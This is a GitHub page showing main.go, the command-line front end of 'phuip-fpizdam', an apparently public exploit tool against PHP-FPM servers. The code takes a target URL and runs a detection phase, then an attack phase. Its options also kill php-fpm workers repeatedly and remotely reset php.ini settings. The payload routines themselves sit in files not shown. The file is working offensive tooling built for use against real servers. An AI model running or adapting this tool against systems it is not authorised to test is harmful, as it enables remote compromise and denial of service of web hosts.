-
Notifications
You must be signed in to change notification settings - Fork 249
/
main.go
139 lines (124 loc) · 4.35 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
package main
import (
"log"
"os"
"time"
"github.com/spf13/cobra"
)
func main() {
var (
method string
cookie string
setting string
logfile string
skipDetect bool
skipAttack bool
killWorkers bool
killCount int
resetSetting bool
resetRetries int
onlyQSL bool
params = &AttackParams{}
delay time.Duration
)
var cmd = &cobra.Command{
Use: "phuip-fpizdam [url]",
Args: cobra.ExactArgs(1),
Run: func(cmd *cobra.Command, args []string) {
url := args[0]
if logfile != "" {
file, err := os.OpenFile(logfile, os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0644)
if err != nil {
log.Fatal(err)
}
defer func() { _ = file.Close() }()
log.SetOutput(file)
}
m, ok := Methods[method]
if !ok {
log.Fatalf("Unknown detection method: %v", method)
}
requester, err := NewRequester(url, cookie, delay)
if err != nil {
log.Fatalf("Failed to create requester: %v", err)
}
if resetSetting {
if !params.Complete() {
log.Fatal("--reset-setting requires complete params")
}
if setting == "" {
setting = m.PHPOptionDisable
}
if resetRetries == -1 {
resetRetries = 1 << 30
}
if err := SetSetting(requester, params, setting, resetRetries); err != nil {
log.Fatalf("ResetSetting() returned error: %v", err)
}
log.Printf("I did my best trying to set %#v", setting)
return
}
if setting != "" {
log.Fatal("--setting requires --reset-setting")
}
if killWorkers {
if params.QueryStringLength == 0 {
log.Fatal("QSL value is required for killing workers")
}
// The breaking payload is 4 bytes shorter than usual (34), so we have
// (Δ|SCRIPT_FILENAME| + Δ|REQUEST_URI| + Δ|DOCUMENT_URI|)/2 = 6.
// This probably won't work in some configurations.
params.QueryStringLength += 6
if err := KillWorkers(requester, params, killCount); err != nil {
log.Fatalf("KillWorkers() returned error: %v", err)
}
log.Printf("all done")
return
}
if skipDetect {
if !params.Complete() {
log.Fatal("Got --skip-detect and attack params are incomplete, don't know what to do")
}
log.Printf("Using attack params %s", params)
} else {
var err error
params, err = Detect(requester, m, params, onlyQSL)
if err != nil {
if err == errPisosBruteForbidden && onlyQSL {
log.Printf("Detect() found QSLs and that's it")
return
}
log.Fatalf("Detect() returned error: %v", err)
}
if !params.Complete() {
log.Fatal("Detect() returned incomplete attack params, something gone wrong")
}
log.Printf("Detect() returned attack params: %s <-- REMEMBER THIS", params)
}
if skipAttack || onlyQSL {
log.Print("Attack phase is disabled, so that's it")
return
}
if err := Attack(requester, params); err != nil {
log.Fatalf("Attack returned error: %v", err)
}
},
}
cmd.Flags().StringVar(&method, "method", "session.auto_start", "detect method (see detect_methods.go)")
cmd.Flags().StringVar(&cookie, "cookie", "", "send this cookie")
cmd.Flags().StringVar(&logfile, "logfile", "", "redirect error log from stderr to a file")
cmd.Flags().IntVar(¶ms.QueryStringLength, "qsl", 0, "qsl hint")
cmd.Flags().IntVar(¶ms.PisosLength, "pisos", 0, "pisos hint")
cmd.Flags().BoolVar(&skipDetect, "skip-detect", false, "skip detection phase")
cmd.Flags().BoolVar(&skipAttack, "skip-attack", false, "skip attack phase")
cmd.Flags().BoolVar(&onlyQSL, "only-qsl", false, "stop after QSL detection, use this if you just want to check if the server is vulnerable")
cmd.Flags().BoolVar(&resetSetting, "reset-setting", false, "try to reset setting (requires attack params)")
cmd.Flags().IntVar(&resetRetries, "reset-retries", SettingEnableRetries, "how many retries to do for --reset-setting, -1 means a lot")
cmd.Flags().StringVar(&setting, "setting", "", "specify custom php.ini setting for --reset-setting")
cmd.Flags().BoolVar(&killWorkers, "kill-workers", false, "just kill php-fpm workers (requires only QSL)")
cmd.Flags().IntVar(&killCount, "kill-count", SettingEnableRetries, "how many times to send the worker killing payload")
cmd.Flags().DurationVar(&delay, "delay", 0, "delay between requests (applied right after each request). Attacks will take *much* longer!")
if err := cmd.Execute(); err != nil {
log.Fatal(err)
}
}